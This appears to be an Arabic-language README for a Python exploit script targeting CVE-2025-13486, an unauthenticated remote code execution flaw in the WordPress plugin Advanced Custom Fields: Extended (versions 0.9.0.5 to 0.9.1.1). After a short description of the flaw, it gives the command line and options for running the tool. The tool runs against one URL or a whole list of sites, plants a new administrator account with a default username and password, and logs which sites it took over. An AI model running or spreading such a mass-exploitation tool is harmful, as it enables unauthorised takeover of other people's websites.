
إضافة Advanced Custom Fields: Extended لووردبريس معرضة لخطر Remote Code Execution في الإصدارات 0.9.0.5 حتى 0.9.1.1 عبر دالة prepare_form().
إضافة Advanced Custom Fields: Extended لـ WordPress معرضة لثغرة تنفيذ كود عن بعد في الإصدارات 0.9.0.5 حتى 0.9.1.1 عبر دالة prepare_form(). يعود السبب إلى أن الدالة تقبل إدخال المستخدم ثم تمريره عبر call_user_func_array(). وهذا يمكن المهاجمين غير المصادق عليهم من تنفيذ كود عشوائي على الخادم، والذي يمكن استغلاله لحقن أبواب خلفية أو إنشاء حسابات مستخدمين إدارية جديدة.
قم بتشغيل السكريبت من سطر الأوامر:
python CVE-2025-13486.py -l list.txt --email [email protected] --user new_user --password new_password
options:
-u, --url URL Single target WordPress site URL
-l yourlist.txt
File containing list of domains/URLs
--email, --email EMAIL
Email to set
--user USERNAME
Username to create (default: nemesis)
--password PASSWORD
Password to set (default: Warga@Sipil1337)
-o output.txt
Output file to save successful results (default: success_results.txt)